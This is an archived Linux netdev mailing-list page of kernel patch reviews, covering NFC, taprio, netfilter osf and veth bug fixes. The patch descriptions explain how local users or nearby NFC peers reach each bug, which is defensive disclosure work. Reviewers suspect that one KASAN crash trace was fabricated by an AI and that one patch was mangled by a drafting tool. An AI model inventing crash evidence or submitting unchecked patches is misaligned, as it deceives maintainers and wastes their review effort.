> (atr_req_len / NFC_ATR_REQ_GT_OFFSET = 14) paths are affected; both are
> fixed symmetrically.
>
> Reachability: the ATR_RES is sent by an NFC-DEP target during RF
> activation, before any authentication or pairing. The bug is therefore
> reachable from any NFC peer within ~4 cm.
>
> Fixes: a99903ec4566 ("NFC: NCI: Handle Target mode activation")
The above commit seems to move rather than add the logic in question.
It seems to me that the following Fixes tag, corresponding to the commit
that introduced this problem, would be the right one.
Fixes: 767f19ae698e ("NFC: Implement NCI dep_link_up and dep_link_down")
> Cc: stable@vger.kernel.org
> Signed-off-by: Lekë Hapçiu <framemain@outlook.com>
> ---
> net/nfc/nci/ntf.c | 22 ++++++++++++++--------
> 1 file changed, 14 insertions(+), 8 deletions(-)
>
> diff --git a/net/nfc/nci/ntf.c b/net/nfc/nci/ntf.c
> index c96512bb8..8eb295580 100644
> --- a/net/nfc/nci/ntf.c
> +++ b/net/nfc/nci/ntf.c
> @@ -631,25 +631,31 @@ static int nci_store_general_bytes_nfc_dep(struct nci_dev *ndev,
> switch (ntf->activation_rf_tech_and_mode) {
> case NCI_NFC_A_PASSIVE_POLL_MODE:
> case NCI_NFC_F_PASSIVE_POLL_MODE:
> + if (ntf->activation_params.poll_nfc_dep.atr_res_len <
> + NFC_ATR_RES_GT_OFFSET)
> + break;
> ndev->remote_gb_len = min_t(__u8,
> - (ntf->activation_params.poll_nfc_dep.atr_res_len
> - - NFC_ATR_RES_GT_OFFSET),
> + ntf->activation_params.poll_nfc_dep.atr_res_len
> + - NFC_ATR_RES_GT_OFFSET,
> NFC_ATR_RES_GB_MAXSIZE);
I'm not suggesting changing this, at least not as part of this bug fix, so
this comment is FTR: as NFC_ATR_RES_GB_MAXSIZE is a compile-time constant,
and the condition added by this patch ensures that the result of the
subtraction is not negative, I strongly suspect that using min() here is
sufficient and thus more appropriate than min_t().
> memcpy(ndev->remote_gb,
> - (ntf->activation_params.poll_nfc_dep.atr_res
> - + NFC_ATR_RES_GT_OFFSET),
> + ntf->activation_params.poll_nfc_dep.atr_res
> + + NFC_ATR_RES_GT_OFFSET,
> ndev->remote_gb_len);
> break;
>
> case NCI_NFC_A_PASSIVE_LISTEN_MODE:
> case NCI_NFC_F_PASSIVE_LISTEN_MODE:
> + if (ntf->activation_params.listen_nfc_dep.atr_req_len <
> + NFC_ATR_REQ_GT_OFFSET)
> + break;
> ndev->remote_gb_len = min_t(__u8,
> - (ntf->activation_params.listen_nfc_dep.atr_req_len
> - - NFC_ATR_REQ_GT_OFFSET),
> + ntf->activation_params.listen_nfc_dep.atr_req_len
> + - NFC_ATR_REQ_GT_OFFSET,
> NFC_ATR_REQ_GB_MAXSIZE);
> memcpy(ndev->remote_gb,
> - (ntf->activation_params.listen_nfc_dep.atr_req
> - + NFC_ATR_REQ_GT_OFFSET),
> + ntf->activation_params.listen_nfc_dep.atr_req
> + + NFC_ATR_REQ_GT_OFFSET,
> ndev->remote_gb_len);
> break;
>
> --
> 2.51.0
>
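The wraparound described in the commit message can be reproduced in user space. The sketch models only the POLL-mode length computation: the constants 15 and 47 are the NFC_ATR_RES_GT_OFFSET and NFC_ATR_RES_GB_MAXSIZE values quoted in the commit message, the helper names are hypothetical, and the uint8_t cast mirrors the conversion min_t(__u8, ...) applies to its operands.

```c
#include <stdint.h>

#define GT_OFFSET  15 /* NFC_ATR_RES_GT_OFFSET, per the commit message */
#define GB_MAXSIZE 47 /* NFC_ATR_RES_GB_MAXSIZE, per the commit message */

static uint8_t min_u8(uint8_t a, uint8_t b)
{
	return a < b ? a : b;
}

/* Pre-fix: the difference is truncated to u8, so short lengths wrap. */
static uint8_t gb_len_unchecked(uint8_t atr_res_len)
{
	return min_u8((uint8_t)(atr_res_len - GT_OFFSET), GB_MAXSIZE);
}

/* Post-fix: a frame shorter than the offset leaves the length at zero. */
static uint8_t gb_len_checked(uint8_t atr_res_len)
{
	if (atr_res_len < GT_OFFSET)
		return 0;
	return min_u8(atr_res_len - GT_OFFSET, GB_MAXSIZE);
}
```

With these helpers, gb_len_unchecked(0) returns 47, the over-read length from the commit message, while gb_len_checked(0) returns 0.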
* Re: [PATCH net v2] net/sched: taprio: fix NULL pointer dereference in class dump
From: Weiming Shi @ 2026-04-14 8:28 UTC
To: Paolo Abeni
Cc: Vinicius Costa Gomes, Jamal Hadi Salim, Jiri Pirko,
David S . Miller, Eric Dumazet, Jakub Kicinski, Simon Horman,
Vladimir Oltean, netdev, linux-kernel, Xiang Mei
In-Reply-To: <6f4ebd09-9fa9-4b6e-97b5-a6b1fcec8774@redhat.com>
On 26-04-14 10:16, Paolo Abeni wrote:
> On 4/10/26 5:39 PM, Weiming Shi wrote:
> > When a TAPRIO child qdisc is deleted via RTM_DELQDISC, taprio_graft()
> > is called with new == NULL and stores NULL into q->qdiscs[cl - 1].
> > Subsequent RTM_GETTCLASS dump operations walk all classes via
> > taprio_walk() and call taprio_dump_class(), which calls taprio_leaf()
> > returning the NULL pointer, then dereferences it to read child->handle,
> > causing a kernel NULL pointer dereference.
> >
> > The bug is reachable with namespace-scoped CAP_NET_ADMIN on any kernel
> > with CONFIG_NET_SCH_TAPRIO enabled. On systems with unprivileged user
> > namespaces enabled, an unprivileged local user can trigger a kernel
> > panic by creating a taprio qdisc inside a new network namespace,
> > grafting an explicit child qdisc, deleting it, and requesting a class
> > dump. The RTM_GETTCLASS dump itself requires no capability.
> >
> > Oops: general protection fault, probably for non-canonical address 0xdffffc0000000007: 0000 [#1] SMP KASAN NOPTI
> > KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f]
> > RIP: 0010:taprio_dump_class (net/sched/sch_taprio.c:2475)
> > Call Trace:
> > <TASK>
> > tc_fill_tclass (net/sched/sch_api.c:1966)
> > qdisc_class_dump (net/sched/sch_api.c:2329)
> > taprio_walk (net/sched/sch_taprio.c:2510)
> > tc_dump_tclass_qdisc (net/sched/sch_api.c:2353)
> > tc_dump_tclass_root (net/sched/sch_api.c:2370)
> > tc_dump_tclass (net/sched/sch_api.c:2431)
> > rtnl_dumpit (net/core/rtnetlink.c:6827)
> > netlink_dump (net/netlink/af_netlink.c:2325)
> > rtnetlink_rcv_msg (net/core/rtnetlink.c:6927)
> > netlink_rcv_skb (net/netlink/af_netlink.c:2550)
> > </TASK>
> >
> > Fix this by substituting &noop_qdisc when new is NULL in
> > taprio_graft(), following the same pattern used by multiq_graft() and
> > prio_graft(). This ensures q->qdiscs[] slots are never NULL, making
> > control-plane dump paths safe without requiring individual NULL checks.
> >
> > Also update the data-plane NULL guards in taprio_enqueue() and
> > taprio_dequeue_from_txq() to check for &noop_qdisc, so that packets
> > are still dropped cleanly without inflating qlen/backlog counters.
> >
> > Fixes: 665338b2a7a0 ("net/sched: taprio: dump class stats for the actual q->qdiscs[]")
> > Reported-by: Xiang Mei <xmei5@asu.edu>
> > Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> > ---
> > v2:
> > - Update NULL checks in taprio_enqueue() and taprio_dequeue_from_txq()
> > to test for &noop_qdisc instead of NULL, preventing qlen/backlog
> > counter inflation when noop_qdisc drops packets (Sashiko)
> > ---
> > net/sched/sch_taprio.c | 11 +++++++----
> > 1 file changed, 7 insertions(+), 4 deletions(-)
> >
> > diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
> > index f721c03514f60..XXXXXXXXX 100644
> > --- a/net/sched/sch_taprio.c
> > +++ b/net/sched/sch_taprio.c
> > @@ -634,7 +634,7 @@ static int taprio_enqueue(struct sk_buff *skb, struct Qdisc *sch,
> >
> > child = q->qdiscs[queue];
> > - if (unlikely(!child))
> > + if (unlikely(child == &noop_qdisc))
> > return qdisc_drop(skb, sch, to_free);
> >
> > if (taprio_skb_exceeds_queue_max_sdu(sch, skb)) {
> > @@ -717,7 +717,7 @@ static struct sk_buff *taprio_dequeue_from_txq(struct Qdisc *sch, int txq,
> > int prio;
> > int len;
> > u8 tc;
> >
> > - if (unlikely(!child))
> > + if (unlikely(child == &noop_qdisc))
> > return NULL;
> >
> > if (TXTIME_ASSIST_IS_ENABLED(q->flags))
> > @@ -2183,6 +2183,9 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> > if (!dev_queue)
> > return -EINVAL;
> >
> > + if (!new)
> > + new = &noop_qdisc;
> > +
> > if (dev->flags & IFF_UP)
> > dev_deactivate(dev);
> >
> > @@ -2196,14 +2199,14 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> > *old = q->qdiscs[cl - 1];
> > if (FULL_OFFLOAD_IS_ENABLED(q->flags)) {
> > WARN_ON_ONCE(dev_graft_qdisc(dev_queue, new) != *old);
> > - if (new)
> > + if (new != &noop_qdisc)
> > qdisc_refcount_inc(new);
> > if (*old)
> > qdisc_put(*old);
> > }
> >
> > q->qdiscs[cl - 1] = new;
> > - if (new)
> > + if (new != &noop_qdisc)
> > new->flags |= TCQ_F_ONETXQUEUE | TCQ_F_NOPARENT;
> >
> > if (dev->flags & IFF_UP)
> > --
> > 2.43.0
>
> It does not apply cleanly to net and looks seriously mangled. I suspect the
> above chunks should be part of the actual patch?!?
>
> Please, whatever tool you are using to help craft the patch, double-check
> the result manually before the actual submission.
>
> /P
>
Hi,
Sorry about the broken v2. I'll double-check everything carefully and
resend as v3.
Thanks,
Weiming
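The v2 approach replaces NULL with a shared placeholder object, the pattern the commit message attributes to multiq_graft() and prio_graft(). A minimal user-space sketch of that pattern follows; struct fake_qdisc, sentinel, graft(), dump_handle() and enqueue_ok() are hypothetical stand-ins for struct Qdisc, &noop_qdisc and the taprio callbacks, not kernel code.

```c
#include <stdbool.h>
#include <stddef.h>

#define NUM_CLASSES 4

/* Only the field the dump path reads. */
struct fake_qdisc {
	unsigned int handle;
};

/* Shared placeholder playing the role of noop_qdisc. */
static struct fake_qdisc sentinel = { .handle = 0 };

static struct fake_qdisc *slots[NUM_CLASSES];

static void init_slots(void)
{
	for (size_t i = 0; i < NUM_CLASSES; i++)
		slots[i] = &sentinel;
}

/* Graft: a NULL child (deletion) is stored as the placeholder, never NULL. */
static void graft(unsigned int cl, struct fake_qdisc *new_child)
{
	slots[cl - 1] = new_child ? new_child : &sentinel;
}

/* Control path: dereferences the slot without a NULL check. */
static unsigned int dump_handle(unsigned int cl)
{
	return slots[cl - 1]->handle;
}

/* Data path: compare against the placeholder instead of NULL. */
static bool enqueue_ok(unsigned int cl)
{
	return slots[cl - 1] != &sentinel;
}
```

The trade-off shows up in enqueue_ok(): once slots can hold the placeholder, every check that used to test for NULL must compare against the placeholder instead, which is what the v2 changelog describes for taprio_enqueue() and taprio_dequeue_from_txq().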
* Re: [PATCH] netfilter: nfnetlink_osf: fix null-ptr-deref in nf_osf_ttl
From: Pablo Neira Ayuso @ 2026-04-14 8:22 UTC
To: Kito Xu (veritas501)
Cc: Florian Westphal, Phil Sutter, David S. Miller, Eric Dumazet,
Jakub Kicinski, Paolo Abeni, Simon Horman,
Fernando Fernandez Mancera, netfilter-devel, coreteam, netdev,
linux-kernel
In-Reply-To: <20260414074556.2512750-1-hxzene@gmail.com>
Hi,
On Tue, Apr 14, 2026 at 03:45:56PM +0800, Kito Xu (veritas501) wrote:
> nf_osf_ttl() calls __in_dev_get_rcu(skb->dev) and passes the result
> to in_dev_for_each_ifa_rcu() without checking for NULL. When the
> receiving device has no IPv4 configuration (ip_ptr is NULL),
> __in_dev_get_rcu() returns NULL and in_dev_for_each_ifa_rcu()
> dereferences it unconditionally, causing a kernel crash.
How could skb->dev be NULL?!
This is run from prerouting, input and forward.
> This can happen when a packet arrives on a device that has had its
> IPv4 configuration removed (e.g., MTU set below IPV4_MIN_MTU causing
> inetdev_destroy) or on a device that was never assigned an IPv4
> address, while an xt_osf or nft_osf rule with TTL_LESS mode is
> active and the packet TTL exceeds the fingerprint TTL.
>
> Add a NULL check for in_dev before the iteration. When in_dev is
> NULL, return 0 (no match) since source-address locality cannot be
> determined without IPv4 addresses on the device.
>
> KASAN: null-ptr-deref in range
> [0x0000000000000010-0x0000000000000017]
> RIP: 0010:nf_osf_match_one+0x204/0xa70
I cannot believe this. I think AI is mocking up this KASAN splat; if that
is the case, I am sorry to say it, but it is too bad if you are doing this.
> Call Trace:
> <IRQ>
> nf_osf_match+0x2f8/0x780
> xt_osf_match_packet+0x11c/0x1f0
> ipt_do_table+0x7fe/0x12b0
> nf_hook_slow+0xac/0x1e0
> ip_rcv+0x123/0x370
> __netif_receive_skb_one_core+0x166/0x1b0
> process_backlog+0x197/0x590
> __napi_poll+0xa1/0x540
> net_rx_action+0x401/0xd80
> handle_softirqs+0x19f/0x610
> </IRQ>
>
> Fixes: a218dc82f0b5 ("netfilter: nft_osf: Add ttl option support")
> Signed-off-by: Kito Xu (veritas501) <hxzene@gmail.com>
> ---
> net/netfilter/nfnetlink_osf.c | 3 +++
> 1 file changed, 3 insertions(+)
>
> diff --git a/net/netfilter/nfnetlink_osf.c b/net/netfilter/nfnetlink_osf.c
> index d64ce21c7b55..85dbd47dbbd4 100644
> --- a/net/netfilter/nfnetlink_osf.c
> +++ b/net/netfilter/nfnetlink_osf.c
> @@ -43,6 +43,9 @@ static inline int nf_osf_ttl(const struct sk_buff *skb,
> else if (ip->ttl <= f_ttl)
> return 1;
>
> + if (!in_dev)
> + return 0;
> +
> in_dev_for_each_ifa_rcu(ifa, in_dev) {
> if (inet_ifa_match(ip->saddr, ifa)) {
> ret = (ip->ttl == f_ttl);
> --
> 2.43.0
>
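For reference, here is a user-space model of the TTL_LESS path as it reads with the patch applied. The early return and the address loop follow the hunk's context lines; struct fake_ifa, struct fake_in_dev and osf_ttl_less_model() are hypothetical stand-ins for struct in_ifaddr, struct in_device and nf_osf_ttl(), and the subnet test mirrors inet_ifa_match().

```c
#include <stddef.h>
#include <stdint.h>

struct fake_ifa {
	uint32_t address; /* host byte order, for simplicity */
	uint32_t mask;
};

struct fake_in_dev {
	const struct fake_ifa *ifa;
	size_t n_ifa;
};

static int osf_ttl_less_model(const struct fake_in_dev *in_dev,
			      uint8_t pkt_ttl, uint32_t saddr, uint8_t f_ttl)
{
	if (pkt_ttl <= f_ttl)
		return 1;

	/* The added guard: no IPv4 configuration means no local match. */
	if (!in_dev)
		return 0;

	for (size_t i = 0; i < in_dev->n_ifa; i++) {
		const struct fake_ifa *ifa = &in_dev->ifa[i];

		/* Same test as inet_ifa_match(): saddr is in this subnet. */
		if (!((saddr ^ ifa->address) & ifa->mask))
			return pkt_ttl == f_ttl;
	}
	return 0;
}
```

In this model the loop is only reached when pkt_ttl > f_ttl, so even a matching address yields 0; returning 0 for a NULL in_dev therefore gives the same result the loop would give.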
* Re: [syzbot ci] Re: veth: add Byte Queue Limits (BQL) support
From: Aleksandr Nogikh @ 2026-04-14 8:17 UTC
To: syzbot+cib904ea9ebb647254, hawk; +Cc: netdev, linux-kernel, syzkaller-bugs
In-Reply-To: <69dd48c2.a00a0220.468cb.004e.GAE@google.com>
Hmm, I just fixed a problem that may have affected `syz test` processing;
let's try again:
#syz test
---
drivers/net/veth.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/drivers/net/veth.c b/drivers/net/veth.c
index 911e7e36e166..9d7b085c9548 100644
--- a/drivers/net/veth.c
+++ b/drivers/net/veth.c
@@ -1138,7 +1138,9 @@ static void veth_napi_del_range(struct net_device *dev, int start, int end)
*/
peer = rtnl_dereference(priv->peer);
if (peer) {
- for (i = start; i < end; i++)
+ int peer_end = min(end, (int)peer->real_num_tx_queues);
+
+ for (i = start; i < peer_end; i++)
netdev_tx_reset_queue(netdev_get_tx_queue(peer, i));
}
* Re: [PATCH net v2] net/sched: taprio: fix NULL pointer dereference in class dump
From: Paolo Abeni @ 2026-04-14 8:16 UTC
To: Weiming Shi, Vinicius Costa Gomes, Jamal Hadi Salim, Jiri Pirko,
David S . Miller, Eric Dumazet, Jakub Kicinski
Cc: Simon Horman, Vladimir Oltean, netdev, linux-kernel, Xiang Mei
In-Reply-To: <20260410153902.955227-2-bestswngs@gmail.com>
On 4/10/26 5:39 PM, Weiming Shi wrote:
> When a TAPRIO child qdisc is deleted via RTM_DELQDISC, taprio_graft()
> is called with new == NULL and stores NULL into q->qdiscs[cl - 1].
> Subsequent RTM_GETTCLASS dump operations walk all classes via
> taprio_walk() and call taprio_dump_class(), which calls taprio_leaf()
> returning the NULL pointer, then dereferences it to read child->handle,
> causing a kernel NULL pointer dereference.
>
> The bug is reachable with namespace-scoped CAP_NET_ADMIN on any kernel
> with CONFIG_NET_SCH_TAPRIO enabled. On systems with unprivileged user
> namespaces enabled, an unprivileged local user can trigger a kernel
> panic by creating a taprio qdisc inside a new network namespace,
> grafting an explicit child qdisc, deleting it, and requesting a class
> dump. The RTM_GETTCLASS dump itself requires no capability.
>
> Oops: general protection fault, probably for non-canonical address 0xdffffc0000000007: 0000 [#1] SMP KASAN NOPTI
> KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f]
> RIP: 0010:taprio_dump_class (net/sched/sch_taprio.c:2475)
> Call Trace:
> <TASK>
> tc_fill_tclass (net/sched/sch_api.c:1966)
> qdisc_class_dump (net/sched/sch_api.c:2329)
> taprio_walk (net/sched/sch_taprio.c:2510)
> tc_dump_tclass_qdisc (net/sched/sch_api.c:2353)
> tc_dump_tclass_root (net/sched/sch_api.c:2370)
> tc_dump_tclass (net/sched/sch_api.c:2431)
> rtnl_dumpit (net/core/rtnetlink.c:6827)
> netlink_dump (net/netlink/af_netlink.c:2325)
> rtnetlink_rcv_msg (net/core/rtnetlink.c:6927)
> netlink_rcv_skb (net/netlink/af_netlink.c:2550)
> </TASK>
>
> Fix this by substituting &noop_qdisc when new is NULL in
> taprio_graft(), following the same pattern used by multiq_graft() and
> prio_graft(). This ensures q->qdiscs[] slots are never NULL, making
> control-plane dump paths safe without requiring individual NULL checks.
>
> Also update the data-plane NULL guards in taprio_enqueue() and
> taprio_dequeue_from_txq() to check for &noop_qdisc, so that packets
> are still dropped cleanly without inflating qlen/backlog counters.
>
> Fixes: 665338b2a7a0 ("net/sched: taprio: dump class stats for the actual q->qdiscs[]")
> Reported-by: Xiang Mei <xmei5@asu.edu>
> Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> ---
> v2:
> - Update NULL checks in taprio_enqueue() and taprio_dequeue_from_txq()
> to test for &noop_qdisc instead of NULL, preventing qlen/backlog
> counter inflation when noop_qdisc drops packets (Sashiko)
> ---
> net/sched/sch_taprio.c | 11 +++++++----
> 1 file changed, 7 insertions(+), 4 deletions(-)
>
> diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
> index f721c03514f60..XXXXXXXXX 100644
> --- a/net/sched/sch_taprio.c
> +++ b/net/sched/sch_taprio.c
> @@ -634,7 +634,7 @@ static int taprio_enqueue(struct sk_buff *skb, struct Qdisc *sch,
>
> child = q->qdiscs[queue];
> - if (unlikely(!child))
> + if (unlikely(child == &noop_qdisc))
> return qdisc_drop(skb, sch, to_free);
>
> if (taprio_skb_exceeds_queue_max_sdu(sch, skb)) {
> @@ -717,7 +717,7 @@ static struct sk_buff *taprio_dequeue_from_txq(struct Qdisc *sch, int txq,
> int prio;
> int len;
> u8 tc;
>
> - if (unlikely(!child))
> + if (unlikely(child == &noop_qdisc))
> return NULL;
>
> if (TXTIME_ASSIST_IS_ENABLED(q->flags))
> @@ -2183,6 +2183,9 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> if (!dev_queue)
> return -EINVAL;
>
> + if (!new)
> + new = &noop_qdisc;
> +
> if (dev->flags & IFF_UP)
> dev_deactivate(dev);
>
> @@ -2196,14 +2199,14 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> *old = q->qdiscs[cl - 1];
> if (FULL_OFFLOAD_IS_ENABLED(q->flags)) {
> WARN_ON_ONCE(dev_graft_qdisc(dev_queue, new) != *old);
> - if (new)
> + if (new != &noop_qdisc)
> qdisc_refcount_inc(new);
> if (*old)
> qdisc_put(*old);
> }
>
> q->qdiscs[cl - 1] = new;
> - if (new)
> + if (new != &noop_qdisc)
> new->flags |= TCQ_F_ONETXQUEUE | TCQ_F_NOPARENT;
>
> if (dev->flags & IFF_UP)
> --
> 2.43.0
Does not apply cleanly to net and looks seriously mangled. I suspect the
above chunks should be part of the actual patch ?!?
Please, whatever tool you are using to help crafting the patch, double
check the result manually before the actual submission.
/P
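For readers following the taprio fix, a minimal userspace sketch of the sentinel pattern the patch description relies on, assuming a heavily simplified qdisc. `struct qdisc`, `noop`, `graft()`, `dump_class_handle()` and `enqueue()` are hypothetical names, not the sch_taprio.c functions. Slots never hold NULL, so the dump path can dereference unconditionally, while the data path compares against the sentinel so a drop does not touch any counters.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, heavily simplified stand-in for struct Qdisc. */
struct qdisc {
	unsigned int handle;
	unsigned int qlen;
};

/* Shared sentinel, in the spirit of the kernel's noop_qdisc. */
static struct qdisc noop = { .handle = 0, .qlen = 0 };

#define NUM_CLASSES 4
static struct qdisc *children[NUM_CLASSES];

/* Every slot starts out pointing at the sentinel, never at NULL. */
static void init_children(void)
{
	for (unsigned int i = 0; i < NUM_CLASSES; i++)
		children[i] = &noop;
}

/* Graft: substitute the sentinel when asked to store NULL; return the old child. */
static struct qdisc *graft(unsigned int cl, struct qdisc *new)
{
	struct qdisc *old = children[cl - 1];

	if (!new)
		new = &noop;
	children[cl - 1] = new;
	return old;
}

/* Control-plane dump: safe to dereference because slots are never NULL. */
static unsigned int dump_class_handle(unsigned int cl)
{
	struct qdisc *child = children[cl - 1];

	assert(child != NULL);
	return child->handle;
}

/* Data plane: test for the sentinel, so a drop leaves every counter alone. */
static int enqueue(unsigned int cl)
{
	struct qdisc *child = children[cl - 1];

	if (child == &noop)
		return -1; /* dropped */
	child->qlen++;
	return 0;
}
```

The sentinel moves the "no child" check out of every control-plane reader and into the one place that writes the slot.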
* Re: [PATCH net 0/3] nfc: llcp: fix OOB reads in TLV parsers and PDU handlers
From: Paolo Abeni @ 2026-04-14 8:11 UTC
To: Lekë Hapçiu, netdev; +Cc: linux-nfc, stable, davem, edumazet, kuba
In-Reply-To: <20260409233517.1891497-1-snowwlake@icloud.com>
On 4/10/26 1:35 AM, Lekë Hapçiu wrote:
> This series fixes three out-of-bounds read vulnerabilities in the NFC
> LLCP layer, all reachable from RF without prior pairing or session
> establishment.
>
> Patch 1 adds missing TLV length bounds checks in nfc_llcp_parse_gb_tlv()
> and nfc_llcp_parse_connection_tlv() — a crafted CONNECT or SNL PDU
> containing a short TLV value field can read beyond the skb tail.
>
> Patch 2 fixes nfc_llcp_recv_snl(), which accessed TLV fields and
> performed arithmetic on an uncapped length byte before any bounds
> check, enabling a 1-byte heap OOB read and a u8 wrap-around.
>
> Patch 3 fixes nfc_llcp_recv_dm(), which read the DM reason byte at
> skb->data[2] without verifying the frame is at least 3 bytes long.
> A 2-byte DM PDU (header only) from a rogue peer triggers a 1-byte
> OOB heap read.
>
> All three bugs are independently triggered via RF (AV:A, AC:L, no
> authentication required).
This series looks like an older iteration of:
https://patchwork.kernel.org/user/todo/netdevbpf/?series=1079400
but it reached the ML 2h afterwards?!?
At very best you have some serious setup issue. Please have a look at
the repost policy and especially at the 24h grace period:
https://elixir.bootlin.com/linux/v7.0/source/Documentation/process/maintainer-netdev.rst
And, given the above problem, please do not share any more patches for
at least 48h.
/P
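The DM fix described in patch 3 of the cover letter comes down to a length check before indexing. A hypothetical sketch over a plain byte buffer (not an skb): `dm_reason()` and `LLCP_HDR_LEN` are illustrative names, with the two-byte header size taken from the description above.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <stdint.h>

/* Two-byte LLCP header, per the cover letter; the name is hypothetical. */
#define LLCP_HDR_LEN 2

/* Return the DM reason byte, or -EINVAL if the PDU is header-only. */
static int dm_reason(const uint8_t *data, size_t len)
{
	if (len < LLCP_HDR_LEN + 1)
		return -EINVAL;
	return data[LLCP_HDR_LEN];
}
```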
* Re: [PATCH net-next] MAINTAINERS: Add netkit selftest files
From: Nikolay Aleksandrov @ 2026-04-14 8:11 UTC
To: Daniel Borkmann, netdev; +Cc: kuba, dw, pabeni
In-Reply-To: <20260414075249.611608-1-daniel@iogearbox.net>
On 14/04/2026 10:52, Daniel Borkmann wrote:
> The following selftest files are related to netkit and should have
> netkit folks in Cc for review:
>
> - tools/testing/selftests/bpf/prog_tests/tc_netkit.c
> - tools/testing/selftests/drivers/net/hw/nk_qlease.py
> - tools/testing/selftests/net/nk_qlease.py
>
> Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
> ---
> [ on top of https://lore.kernel.org/netdev/20260413220809.604592-1-daniel@iogearbox.net/ ]
>
> MAINTAINERS | 3 +++
> 1 file changed, 3 insertions(+)
>
> diff --git a/MAINTAINERS b/MAINTAINERS
> index 65902b97f5df..fa1bdb1db73e 100644
> --- a/MAINTAINERS
> +++ b/MAINTAINERS
> @@ -4901,6 +4901,9 @@ L: netdev@vger.kernel.org
> S: Supported
> F: drivers/net/netkit.c
> F: include/net/netkit.h
> +F: tools/testing/selftests/bpf/prog_tests/tc_netkit.c
> +F: tools/testing/selftests/drivers/net/hw/nk_qlease.py
> +F: tools/testing/selftests/net/nk_qlease.py
>
> BPF [NETWORKING] (struct_ops, reuseport)
> M: Martin KaFai Lau <martin.lau@linux.dev>
Reviewed-by: Nikolay Aleksandrov <razor@blackwall.org>
* Re: Re: [syzbot ci] Re: veth: add Byte Queue Limits (BQL) support
From: syzbot ci @ 2026-04-14 8:08 UTC
To: hawk
Cc: andrew, ast, bpf, corbet, daniel, davem, edumazet, frederic, hawk,
horms, j.koeppeler, john.fastabend, kernel-team, kuba, linux-doc,
linux-kernel, linux-kselftest, netdev, pabeni, sdf, shuah, syzbot,
syzkaller-bugs
In-Reply-To: <41689f2e-8786-49a6-912d-f65e48245a61@kernel.org>
Please attach the patch to act upon.
* Re: [syzbot ci] Re: veth: add Byte Queue Limits (BQL) support
From: Jesper Dangaard Brouer @ 2026-04-14 8:06 UTC
To: syzbot ci, andrew, ast, bpf, corbet, daniel, davem, edumazet,
frederic, horms, j.koeppeler, john.fastabend, kernel-team, kuba,
linux-doc, linux-kernel, linux-kselftest, netdev, pabeni, sdf,
shuah
Cc: syzbot, syzkaller-bugs
In-Reply-To: <69dd48c2.a00a0220.468cb.004e.GAE@google.com>
[-- Attachment #1: Type: text/plain, Size: 4594 bytes --]
On 13/04/2026 21.49, syzbot ci wrote:
> syzbot ci has tested the following series
>
> [v2] veth: add Byte Queue Limits (BQL) support
> https://lore.kernel.org/all/20260413094442.1376022-1-hawk@kernel.org
> * [PATCH net-next v2 1/5] net: add dev->bql flag to allow BQL sysfs for IFF_NO_QUEUE devices
> * [PATCH net-next v2 2/5] veth: implement Byte Queue Limits (BQL) for latency reduction
> * [PATCH net-next v2 3/5] veth: add tx_timeout watchdog as BQL safety net
> * [PATCH net-next v2 4/5] net: sched: add timeout count to NETDEV WATCHDOG message
> * [PATCH net-next v2 5/5] selftests: net: add veth BQL stress test
>
> and found the following issue:
> WARNING in veth_napi_del_range
>
> Full report is available here:
> https://ci.syzbot.org/series/ee732006-8545-4abd-a105-b4b1592a7baf
>
> ***
>
> WARNING in veth_napi_del_range
>
I attached a reproducer myself.
- I have V3 ready; see below for the diff.
> tree: net-next
> URL: https://kernel.googlesource.com/pub/scm/linux/kernel/git/netdev/net-next.git
> base: 8806d502e0a7e7d895b74afbd24e8550a65a2b17
> arch: amd64
> compiler: Debian clang version 21.1.8 (++20251221033036+2078da43e25a-1~exp1~20251221153213.50), Debian LLD 21.1.8
> config: https://ci.syzbot.org/builds/90743a26-f003-44cf-abcc-5991c47588b2/config
> syz repro: https://ci.syzbot.org/findings/d068bfb2-9f8b-466a-95b4-cd7e7b00006c/syz_repro
>
> ------------[ cut here ]------------
> index >= dev->num_tx_queues
> WARNING: ./include/linux/netdevice.h:2672 at netdev_get_tx_queue include/linux/netdevice.h:2672 [inline], CPU#0: syz.1.27/6002
> WARNING: ./include/linux/netdevice.h:2672 at veth_napi_del_range+0x3b7/0x4e0 drivers/net/veth.c:1142, CPU#0: syz.1.27/6002
> Modules linked in:
> CPU: 0 UID: 0 PID: 6002 Comm: syz.1.27 Not tainted syzkaller #0 PREEMPT(full)
> Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
> RIP: 0010:netdev_get_tx_queue include/linux/netdevice.h:2672 [inline]
> RIP: 0010:veth_napi_del_range+0x3b7/0x4e0 drivers/net/veth.c:1142
> Code: 00 e8 ad 96 69 fe 44 39 6c 24 10 74 5e e8 41 61 44 fb 41 ff c5 49 bc 00 00 00 00 00 fc ff df e9 6d ff ff ff e8 2a 61 44 fb 90 <0f> 0b 90 42 80 3c 23 00 75 8e eb 94 48 8b 0c 24 80 e1 07 80 c1 03
> RSP: 0018:ffffc90003adf918 EFLAGS: 00010293
> RAX: ffffffff86814ec6 RBX: 1ffff110227a6c03 RCX: ffff888103a857c0
> RDX: 0000000000000000 RSI: 0000000000000002 RDI: 0000000000000002
> RBP: 1ffff110227a6c9a R08: ffff888113f01ab7 R09: 0000000000000000
> R10: ffff888113f01a98 R11: ffffed10227e0357 R12: dffffc0000000000
> R13: 0000000000000002 R14: 0000000000000002 R15: ffff888113d36018
> FS: 000055555ea16500(0000) GS:ffff88818de4a000(0000) knlGS:0000000000000000
> CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: 00007efc287456b8 CR3: 000000010cdd0000 CR4: 00000000000006f0
> Call Trace:
> <TASK>
> veth_napi_del drivers/net/veth.c:1153 [inline]
> veth_disable_xdp+0x1b0/0x310 drivers/net/veth.c:1255
> veth_xdp_set drivers/net/veth.c:1693 [inline]
